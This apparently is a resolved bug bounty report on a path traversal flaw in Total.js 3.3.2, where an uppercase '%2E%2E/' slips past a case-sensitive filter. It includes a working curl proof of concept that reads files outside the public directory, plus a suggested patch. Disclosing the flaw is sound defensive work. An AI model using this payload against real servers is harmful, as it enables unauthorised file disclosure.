[Total.js] Path traversal vulnerability allows to read files outside public directory
Medium
Vulnerability Details
I would like to report a path traversal in Total.js.
It allows reading arbitrary files outside the public directory.
# Module
**module name:** Total.js
**version:** 3.3.2
**npm page:** `https://www.npmjs.com/package/total.js`
## Module Description
Total.js is a framework for the Node.js platform written in pure JavaScript, similar to PHP's Laravel, Python's Django or ASP.NET MVC. It can be used for web, desktop, service or IoT applications.
## Module Stats
2,125 weekly downloads
# Vulnerability
## Vulnerability Description
Total.js rejects requests whose `req.uri.pathname` contains the lowercase encoded dot `%2e` [[reference]](https://github.com/totaljs/framework/blob/3fd5788ef28f3caf944d76a1135ab367bc0953b8/index.js#L8088). The check is case-sensitive, so the uppercase encoding `%2E` is not rejected. Percent-decoding treats `%2e` and `%2E` identically (RFC 3986, section 2.1), so a request path containing `%2E%2E/` decodes to `../`, bypasses the blacklist and traverses outside the public directory.
## Steps To Reproduce:
1. Clone an empty project from Total.js: `git clone https://github.com/totaljs/emptyproject`.
2. Install Total.js within the directory: `cd emptyproject; npm install total.js`.
3. Launch the server: `node debug.js`.
4. Test path traversal: `curl http://localhost:8000/%2E%2E/debug.js`. The response is the contents of `debug.js` from the project root, a file outside the public directory; the same request with the lowercase `%2e%2e` is rejected by the existing check.
## Patch
Also disallow `%2E` in the `pathname`, i.e. make the encoded-dot check case-insensitive, or apply the check after percent-decoding so that every case variant is covered.
## Supporting Material/References:
- Ubuntu 18.04
- Node 12.13.1
- NPM 6.12.1
- cURL 7.58.0
# Wrap up
- I contacted the maintainer to let them know: N
- I opened an issue in the related repository: N
## Impact
Path traversal: an unauthenticated remote client can read arbitrary files outside the public directory, limited only by the file permissions of the Total.js process.
Report Stats
- Report ID: 748765
- State: Closed
- Substate: resolved
- Upvotes: 16